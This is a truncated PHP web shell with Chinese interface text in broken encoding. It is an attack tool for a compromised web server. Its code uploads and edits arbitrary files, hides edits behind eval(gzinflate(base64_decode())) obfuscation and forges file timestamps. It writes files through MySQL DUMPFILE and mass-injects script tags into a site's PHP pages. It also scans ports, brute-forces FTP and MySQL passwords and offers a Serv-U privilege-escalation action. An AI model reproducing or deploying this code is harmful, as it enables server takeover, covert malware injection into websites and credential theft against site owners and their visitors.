<body style="table-layout:fixed; word-break:break-all onmouseover="window.status='<27><><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>վ<EFBFBD><D5BE><EFBFBD><EFBFBD>Ա<EFBFBD><D4B1>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9><EFBFBD>ڷǷ<DAB7><C7B7><EFBFBD>;,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߸Ų<DFB8><C5B2><EFBFBD><EFBFBD><EFBFBD>';return true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
|
|||
|
<center>
|
|||
|
<?php
|
|||
|
//$_SERVER["DOCUMENT_ROOT"]
|
|||
|
$tb->tableheader();
|
|||
|
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y<><59>m<EFBFBD><6D>d<EFBFBD><64> h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top');
|
|||
|
$tb->tdbody('<a href="?dir='.$dirpath.'"><3E><>Ŀ¼</a> | <a href="?action=dir">ShellĿ¼</a> | <a href="?action=phpenv"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a> | <a href="?action=proxy"><3E><><EFBFBD>ߴ<EFBFBD><DFB4><EFBFBD></a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=crack"><3E><><EFBFBD><EFBFBD><EFBFBD>ƽ<EFBFBD></a> | <a href="?action=mix"><3E><>ѹmix.dll</a> | <a href="?action=logout">ע<><D7A2><EFBFBD><EFBFBD>¼</a>');
|
|||
|
$tb->tdbody('<a href="?action=plgm"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a> | <a href="?action=downloads">Http<74>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD></a> | <a href="?action=search&dir='.$dir.'"><3E>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD></a> | <a href="?action=eval">ִ<><D6B4>php<68>ű<EFBFBD></a> | <a href="?action=sql">ִ<><D6B4>SQL<51><4C><EFBFBD><EFBFBD></a> | <a href="?action=mysqlfun">Func<6E><63><EFBFBD><EFBFBD>Shell</a> | <a href="?action=sqlbak">MySQL<51><4C><EFBFBD><EFBFBD></a> | <a href="?action=SUExp">Serv-U<><55>Ȩ</a>');
|
|||
|
$tb->tablefooter();
|
|||
|
?>
|
|||
|
<hr width="775" noshade>
|
|||
|
<table width="775" border="0" cellpadding="0">
|
|||
|
<?
|
|||
|
$tb->headerform(array('method'=>'GET','content'=>'<p><3E><><EFBFBD><EFBFBD>·<EFBFBD><C2B7>: '.$pathname.'<br><3E><>ǰĿ¼('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br><3E><>תĿ¼: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','ȷ<><C8B7>','','submit').' <20><>֧<EFBFBD>־<EFBFBD><D6BE><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD>'));
|
|||
|
|
|||
|
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'<27>ϴ<EFBFBD><CFB4>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ǰĿ¼: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','ȷ<><C8B7>','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
|
|||
|
|
|||
|
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'<27>½<EFBFBD><C2BD>ļ<EFBFBD><C4BC>ڵ<EFBFBD>ǰĿ¼: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','ȷ<><C8B7>','','submit')));
|
|||
|
|
|||
|
$tb->headerform(array('content'=>'<27>½<EFBFBD>Ŀ¼<C4BF>ڵ<EFBFBD>ǰĿ¼: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','ȷ<><C8B7>','','submit')));
|
|||
|
?>
|
|||
|
</table>
|
|||
|
<hr width="775" noshade>
|
|||
|
<?php
|
|||
|
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><>ʼ =====================*/
|
|||
|
echo "<p><b>\n";
|
|||
|
// ɾ<><C9BE><EFBFBD>ļ<EFBFBD>
|
|||
|
if (!empty($delfile)) {
|
|||
|
if (file_exists($delfile)) {
|
|||
|
echo (@unlink($delfile)) ? $delfile." ɾ<><C9BE><EFBFBD>ɹ<EFBFBD>!" : "<22>ļ<EFBFBD>ɾ<EFBFBD><C9BE>ʧ<EFBFBD><CAA7>!";
|
|||
|
} else {
|
|||
|
echo basename($delfile)." <20>ļ<EFBFBD><C4BC>Ѳ<EFBFBD><D1B2><EFBFBD><EFBFBD><EFBFBD>!";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// ɾ<><C9BE>Ŀ¼
|
|||
|
elseif (!empty($deldir)) {
|
|||
|
$deldirs="$dir/$deldir";
|
|||
|
if (!file_exists("$deldirs")) {
|
|||
|
echo "$deldir Ŀ¼<C4BF>Ѳ<EFBFBD><D1B2><EFBFBD><EFBFBD><EFBFBD>!";
|
|||
|
} else {
|
|||
|
echo (deltree($deldirs)) ? "Ŀ¼ɾ<C2BC><C9BE><EFBFBD>ɹ<EFBFBD>!" : "Ŀ¼ɾ<C2BC><C9BE>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD>Ŀ¼
|
|||
|
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
|
|||
|
if (!empty($newdirectory)) {
|
|||
|
$mkdirs="$dir/$newdirectory";
|
|||
|
if (file_exists("$mkdirs")) {
|
|||
|
echo "<22><>Ŀ¼<C4BF>Ѵ<EFBFBD><D1B4><EFBFBD>!";
|
|||
|
} else {
|
|||
|
echo (@mkdir("$mkdirs",0777)) ? "<22><><EFBFBD><EFBFBD>Ŀ¼<C4BF>ɹ<EFBFBD>!" : "<22><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
@chmod("$mkdirs",0777);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20>ϴ<EFBFBD><CFB4>ļ<EFBFBD>
|
|||
|
elseif ($doupfile) {
|
|||
|
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "<22>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>!" : "<22>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
elseif($action=="mysqlup"){
|
|||
|
$filename = $_FILES['upfile']['tmp_name'];
|
|||
|
if(!$filename) {
|
|||
|
echo"û<><C3BB>ѡ<EFBFBD><D1A1>Ҫ<EFBFBD>ϴ<EFBFBD><CFB4><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>";
|
|||
|
}else{
|
|||
|
$shell = file_get_contents($filename);
|
|||
|
$mysql = bin2hex($shell);
|
|||
|
if(!$upname) $upname = $_FILES['upfile']['name'];
|
|||
|
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
|
|||
|
$link=@mysql_connect($host,$user,$password);
|
|||
|
if(!$link){
|
|||
|
echo "<22><>½ʧ<C2BD><CAA7>".mysql_error();
|
|||
|
}else{
|
|||
|
$result = mysql_query($shell, $link);
|
|||
|
if($result){
|
|||
|
echo"<22><><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>.<2E>ļ<EFBFBD><C4BC>ɹ<EFBFBD><C9B9>ϴ<EFBFBD><CFB4><EFBFBD>".$host.",<2C>ļ<EFBFBD><C4BC><EFBFBD>Ϊ".$uppath."/".$upname."..";
|
|||
|
}else{
|
|||
|
echo"<22>ϴ<EFBFBD>ʧ<EFBFBD><CAA7> ԭ<><D4AD>:".mysql_error();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
elseif($action=="mysqldown"){
|
|||
|
if(!empty($downtmp)) echo $downtmp;
|
|||
|
}
|
|||
|
// <20>༭<EFBFBD>ļ<EFBFBD>
|
|||
|
elseif ($_POST['do'] == 'doeditfile') {
|
|||
|
if (!empty($_POST['editfilename'])) {
|
|||
|
if(!file_exists($editfilename)) unset($retime);
|
|||
|
if($time==$now) $time = @filemtime($editfilename);
|
|||
|
$time2 = @date("Y-m-d H:i:s",$time);
|
|||
|
$filename="$editfilename";
|
|||
|
@$fp=fopen("$filename","w");
|
|||
|
if($_POST['change']=="yes"){
|
|||
|
$filecontent = "?".">".$_POST['filecontent']."<?";
|
|||
|
$filecontent = gzdeflate($filecontent);
|
|||
|
$filecontent = base64_encode($filecontent);
|
|||
|
$filecontent = "<?php\n/*\n<><6E><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dz<EFBFBD><C7B3><EFBFBD>ķ<EFBFBD><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>";
|
|||
|
}else{
|
|||
|
$filecontent = $_POST['filecontent'];
|
|||
|
}
|
|||
|
echo $msg=@fwrite($fp,$filecontent) ? "д<><D0B4><EFBFBD>ļ<EFBFBD><C4BC>ɹ<EFBFBD>!" : "д<><D0B4>ʧ<EFBFBD><CAA7>!";
|
|||
|
@fclose($fp);
|
|||
|
if($retime=="yes"){
|
|||
|
echo" <3B><><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>:";
|
|||
|
echo $msg=@touch($filename,$time) ? "<22><EFBFBD><DEB8>ļ<EFBFBD>Ϊ".$time2."<22>ɹ<EFBFBD>!" : "<22><EFBFBD><DEB8>ļ<EFBFBD>ʱ<EFBFBD><CAB1>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
} else {
|
|||
|
echo "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>༭<EFBFBD><E0BCAD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>!";
|
|||
|
}
|
|||
|
}
|
|||
|
//<2F>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
elseif ($_POST['do'] == 'downloads') {
|
|||
|
$contents = @file_get_contents($_POST['durl']);
|
|||
|
if(!$contents){
|
|||
|
echo"<22><EFBFBD><DEB7><EFBFBD>ȡҪ<C8A1><D2AA><EFBFBD>ص<EFBFBD><D8B5><EFBFBD><EFBFBD><EFBFBD>";
|
|||
|
}
|
|||
|
elseif(file_exists($path)){
|
|||
|
echo"<22>ܱ<EFBFBD>Ǹ<EFBFBD><C7B8><EFBFBD>ļ<EFBFBD>".$path."<22>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ˣ<EFBFBD><CBA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>";
|
|||
|
}else{
|
|||
|
$fp = @fopen($path,"w");
|
|||
|
echo $msg=@fwrite($fp,$contents) ? "<22><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC>ɹ<EFBFBD>!" : "<22><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>д<EFBFBD><D0B4>ʱʧ<CAB1><CAA7>!";
|
|||
|
@fclose($fp);
|
|||
|
}
|
|||
|
}
|
|||
|
elseif($_POST['action']=="mix"){
|
|||
|
if(!file_exists($_POST['mixto'])){
|
|||
|
$tmp = base64_decode($mixdll);
|
|||
|
$tmp = gzinflate($tmp);
|
|||
|
$fp = fopen($_POST['mixto'],"w");
|
|||
|
echo $msg=@fwrite($fp,$tmp) ? "<22><>ѹ<EFBFBD><D1B9><EFBFBD>ɹ<EFBFBD>!" : "<22><>Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD>д<EFBFBD>ɣ<EFBFBD>!";
|
|||
|
fclose($fp);
|
|||
|
}else{
|
|||
|
echo"<22><><EFBFBD>ǰɣ<C7B0>".$_POST['mixto']."<22>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ү~";
|
|||
|
}
|
|||
|
}
|
|||
|
// <20>༭<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
elseif ($_POST['do'] == 'editfileperm') {
|
|||
|
if (!empty($_POST['fileperm'])) {
|
|||
|
$fileperm=base_convert($_POST['fileperm'],8,10);
|
|||
|
echo (@chmod($dir."/".$file,$fileperm)) ? "<22><><EFBFBD><EFBFBD><EFBFBD>ijɹ<C4B3>!" : "<22><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
echo " <20>ļ<EFBFBD> ".$file." <20>ĺ<DEB8><C4BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
|
|||
|
} else {
|
|||
|
echo "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>!";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
elseif ($_POST['do'] == 'rename') {
|
|||
|
if (!empty($_POST['newname'])) {
|
|||
|
$newname=$_POST['dir']."/".$_POST['newname'];
|
|||
|
if (@file_exists($newname)) {
|
|||
|
echo "".$_POST['newname']." <20>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>!";
|
|||
|
} else {
|
|||
|
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." <20>ɹ<EFBFBD><C9B9><EFBFBD><EFBFBD><EFBFBD>Ϊ ".$_POST['newname']." !" : "<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
} else {
|
|||
|
echo "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>ĵ<EFBFBD><C4B5>ļ<EFBFBD><C4BC><EFBFBD>!";
|
|||
|
}
|
|||
|
}
|
|||
|
elseif ($_POST['do'] == 'search') {
|
|||
|
if(!empty($oldkey)){
|
|||
|
echo"<span class=\"redfont\"><3E><><EFBFBD>ҹؼ<D2B9><D8BC><EFBFBD>:[".$oldkey."],<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ<EFBFBD><CABE><EFBFBD>ҵĽ<D2B5><C4BD><EFBFBD>:";
|
|||
|
if($type2 == "getpath"){
|
|||
|
echo"<22><><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD><C6B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC>ϻ<EFBFBD><CFBB>в<EFBFBD><D0B2>ֽ<EFBFBD>ȡ<EFBFBD><C8A1>ʾ.";
|
|||
|
}
|
|||
|
echo"</span><br><hr width=\"775\" noshade>";
|
|||
|
find($path);
|
|||
|
}else{
|
|||
|
echo"<22><>Ҫ<EFBFBD><D2AA>Ϻ<EFBFBD><CFBA>?<3F><><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA>Ϻ<EFBFBD><CFBA><EFBFBD><EFBFBD>?<3F><>û<EFBFBD><C3BB>Ϻ<EFBFBD><CFBA>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?";
|
|||
|
}
|
|||
|
}
|
|||
|
elseif ($_GET['action']=='plgmok') {
|
|||
|
dirtree($_POST['dir'],$_POST['mm']);
|
|||
|
}
|
|||
|
elseif ($_GET['action'] == "plgm") {
|
|||
|
$action = '?action=plgmok';
|
|||
|
$gm = "<script src=http://127.0.0.1></script>";
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>');
|
|||
|
$tb->tdbody('<27><>վ<EFBFBD><D5BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>php<68><70>','center');
|
|||
|
$tb->tdbody('<27>ļ<EFBFBD>λ<EFBFBD><CEBB>: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>Ҫ<>Ҵ<EFBFBD><D2B4><EFBFBD>:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>').'<br>'.$tb->makeinput('submit','<27><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD>','','submit'),'center','1','35');
|
|||
|
echo "</form>";
|
|||
|
$tb->tablefooter();
|
|||
|
}//end plgm
|
|||
|
// <20><>¡ʱ<C2A1><CAB1>
|
|||
|
elseif ($_POST['do'] == 'domodtime') {
|
|||
|
if (!@file_exists($_POST['curfile'])) {
|
|||
|
echo "Ҫ<>ĵ<DEB8><C4B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!";
|
|||
|
} else {
|
|||
|
if (!@file_exists($_POST['tarfile'])) {
|
|||
|
echo "Ҫ<><D2AA><EFBFBD>յ<EFBFBD><D5B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!";
|
|||
|
} else {
|
|||
|
$time=@filemtime($_POST['tarfile']);
|
|||
|
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." <20><><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD>Ϊ ".date("Y-m-d H:i:s",$time)." !" : "<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20>Զ<EFBFBD><D4B6><EFBFBD>ʱ<EFBFBD><CAB1>
|
|||
|
elseif ($_POST['do'] == 'modmytime') {
|
|||
|
if (!@file_exists($_POST['curfile'])) {
|
|||
|
echo "Ҫ<>ĵ<DEB8><C4B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!";
|
|||
|
} else {
|
|||
|
$year=$_POST['year'];
|
|||
|
$month=$_POST['month'];
|
|||
|
$data=$_POST['data'];
|
|||
|
$hour=$_POST['hour'];
|
|||
|
$minute=$_POST['minute'];
|
|||
|
$second=$_POST['second'];
|
|||
|
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
|
|||
|
$time=strtotime("$data $month $year $hour:$minute:$second");
|
|||
|
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." <20><><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD>Ϊ ".date("Y-m-d H:i:s",$time)." !" : "<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
elseif($do =='port'){
|
|||
|
$tmp = explode(",",$port);
|
|||
|
$count = count($tmp);
|
|||
|
for($i=$first;$i<$count;$i++){
|
|||
|
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
|
|||
|
if($fp) echo"<22><><EFBFBD><EFBFBD>".$host."<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˶˿<CBB6>".$tmp[$i]."<br>";
|
|||
|
}
|
|||
|
}
|
|||
|
/*
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD>ú<EFBFBD><EFBFBD>ӣ<EFBFBD>˵ʵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֪<EFBFBD><EFBFBD>д<EFBFBD><EFBFBD>ʲô<EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ã<EFBFBD><EFBFBD>Ҿ<EFBFBD>û<EFBFBD><EFBFBD><EFBFBD>ˣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɴ<EFBFBD><EFBFBD><EFBFBD>д<EFBFBD>ɡ<EFBFBD>*/
|
|||
|
elseif ($do == 'crack') {//<2F><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2>Ϊȫ<CEAA>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD>ˡ<EFBFBD>
|
|||
|
if(@file_exists($passfile)){
|
|||
|
$tmp = file($passfile);
|
|||
|
$count = count($tmp);
|
|||
|
if(empty($onetime)){
|
|||
|
$onetime = $count;
|
|||
|
$turn="1";
|
|||
|
}else{
|
|||
|
$nowturn = $turn+1;
|
|||
|
$now = $turn*$onetime;
|
|||
|
$tt = intval(($count/$onetime)+1);
|
|||
|
}
|
|||
|
if($turn>$tt or $onetime>$count){
|
|||
|
echo"<22><><EFBFBD><EFBFBD><EFBFBD>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ү~Ҫ<><D2AA><EFBFBD>ƽ<EFBFBD><C6BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̵ģ<CCB5><C4A3>ܱ<EFBFBD>Ǹʧ<C7B8>ܡ<EFBFBD>";
|
|||
|
}else{
|
|||
|
$first = $onetime*($turn-1);
|
|||
|
for($i=$first;$i<$now;$i++){
|
|||
|
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
|
|||
|
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
|
|||
|
if($sa)
|
|||
|
{
|
|||
|
$t = "<22><>ȡ".$user."<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ".$tmp[$i]."";
|
|||
|
}
|
|||
|
}
|
|||
|
if(!$t){
|
|||
|
echo "<meta http-equiv=\"refresh\" content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span style=\"font-size: 12px; font-family: Verdana\"><a href=\"".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\"><3E>ֵ<EFBFBD><D6B5>ܹ<EFBFBD>".$count."<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>".$first."<22><>".$now."<22><>".$admin[jumpsecond]."<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>".$onetime."<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̽. >>></a><br>ȫ<><C8AB><EFBFBD>˴<EFBFBD>".$type."<22><><EFBFBD>ƽ<EFBFBD><C6BD><EFBFBD>Ҫ".$tt."<22>Σ<EFBFBD><CEA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǵ<EFBFBD>".$turn."<22>ν<EFBFBD><CEBD>ܡ<EFBFBD></span>";
|
|||
|
}
|
|||
|
else {
|
|||
|
echo"$t";
|
|||
|
}
|
|||
|
}
|
|||
|
}else{
|
|||
|
echo"<22>ֵ<EFBFBD><D6B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD><DAA3><EFBFBD>ȷ<EFBFBD><C8B7><EFBFBD><EFBFBD>";
|
|||
|
}
|
|||
|
}
|
|||
|
elseif($do =='port'){
|
|||
|
if(!eregi("-",$port)){
|
|||
|
$tmp = explode(",",$port);
|
|||
|
$count = count($tmp);
|
|||
|
$first = "1";
|
|||
|
}else{
|
|||
|
$tmp = explode("-",$port);
|
|||
|
$first = $tmp[0];
|
|||
|
$count = $tmp[1];
|
|||
|
|
|||
|
}
|
|||
|
for($i=$first;$i<$count;$i++){
|
|||
|
if(!eregi("-",$port)){
|
|||
|
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
|
|||
|
if($fp) echo"<22><><EFBFBD><EFBFBD>".$host."<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˶˿<CBB6>".$tmp[$i]."<br>";
|
|||
|
}else{
|
|||
|
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
|
|||
|
if($fp) echo"<22><><EFBFBD><EFBFBD>".$host."<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˶˿<CBB6>".$i."<br>";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
// <20><><EFBFBD><EFBFBD>MYSQL
|
|||
|
elseif ($connect) {
|
|||
|
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
|
|||
|
echo "<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD>ӳɹ<D3B3>!";
|
|||
|
mysql_close();
|
|||
|
} else {
|
|||
|
echo mysql_error();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// ִ<><D6B4>SQL<51><4C><EFBFBD><EFBFBD>
|
|||
|
elseif ($_POST['do'] == 'query') {
|
|||
|
@mysql_connect($servername,$dbusername,$dbpassword) or die("<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
@mysql_select_db($dbname) or die("ѡ<><D1A1><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
$result = @mysql_query($_POST['sql_query']);
|
|||
|
echo ($result) ? "SQL<51><4C><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>ִ<EFBFBD><D6B4>!" : "<22><><EFBFBD><EFBFBD>: ".mysql_error();
|
|||
|
mysql_close();
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD>ݲ<EFBFBD><DDB2><EFBFBD>
|
|||
|
elseif ($_POST['do'] == 'backupmysql') {
|
|||
|
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
|
|||
|
echo "<22><>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݵ<EFBFBD><DDB5><EFBFBD><EFBFBD>ݱ<EFBFBD><DDB1>ͱ<EFBFBD><CDB1>ݷ<EFBFBD>ʽ!";
|
|||
|
} else {
|
|||
|
if ($_POST['backuptype'] == 'server') {
|
|||
|
@mysql_connect($servername,$dbusername,$dbpassword) or die("<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
@mysql_select_db($dbname) or die("ѡ<><D1A1><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
$table = array_flip($_POST['table']);
|
|||
|
$filehandle = @fopen($path,"w");
|
|||
|
if ($filehandle) {
|
|||
|
$result = mysql_query("SHOW tables");
|
|||
|
echo ($result) ? NULL : "<22><><EFBFBD><EFBFBD>: ".mysql_error();
|
|||
|
while ($currow = mysql_fetch_array($result)) {
|
|||
|
if (isset($table[$currow[0]])) {
|
|||
|
sqldumptable($currow[0], $filehandle);
|
|||
|
fwrite($filehandle,"\n\n\n");
|
|||
|
}
|
|||
|
}
|
|||
|
fclose($filehandle);
|
|||
|
echo "<22><><EFBFBD>ݿ<EFBFBD><DDBF>ѳɹ<D1B3><C9B9><EFBFBD><EFBFBD>ݵ<EFBFBD> <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
|
|||
|
mysql_close();
|
|||
|
} else {
|
|||
|
